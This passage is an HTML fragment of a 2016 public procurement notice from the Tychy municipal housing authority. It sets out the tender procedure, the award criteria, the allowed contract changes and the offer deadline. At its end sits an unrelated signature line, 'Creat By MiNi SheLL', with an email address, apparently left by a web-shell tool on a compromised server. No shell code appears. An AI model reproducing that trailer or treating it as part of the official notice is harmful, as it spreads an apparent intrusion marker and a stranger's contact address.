       -   jaki jest zakres w jakim okresie inny podmiot będzie brał udział przy wykonywaniu
            zamówienia.
Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego, powinien być 
podpisany wyłącznie przez osoby upoważnione na piśmie lub wpisane w odpowiednich dokumentach rejestrowych w imieniu reprezentowanego podmiotu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Stawka roboczogodziny kosztorysowej:  R-g brutto (R+Kp.+Zysk) - 40</li>
<li>3 - Termin płatności - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku 
      do treści oferty, na podstawie której dokonano wyboru wykonawcy w następujących 
      przypadkach:
1)	   zmian personalnych, adresowych, formy prawnej stron umowy;
2)	   zmiany osoby/osób odpowiedzialnych za przedmiotu umowy;
3)	 zmiany wynagrodzenia Wykonawcy w związku ze zmianą obowiązującej stawki VAT; jeśli  
  zmiana stawki VAT będzie powodować zmiany kosztów wykonania umowy po stronie 
  Wykonawcy, Zamawiający dopuszcza możliwość zmiany wynagrodzenia o kwotę równą 
  różnicy w kwocie podatku zapłaconego przez Wykonawcę;
    4)   zmiany podwykonawcy robót w trakcie trwania umowy - za zgodą Zamawiającego;
          5)   zmniejszenia powierzchni (m2) administrowanych lokali - zmianie ulegnie wysokość 
                miesięcznego wynagrodzenia ryczałtowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzbm.tychy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny , 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.04.2016 godzina 08:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com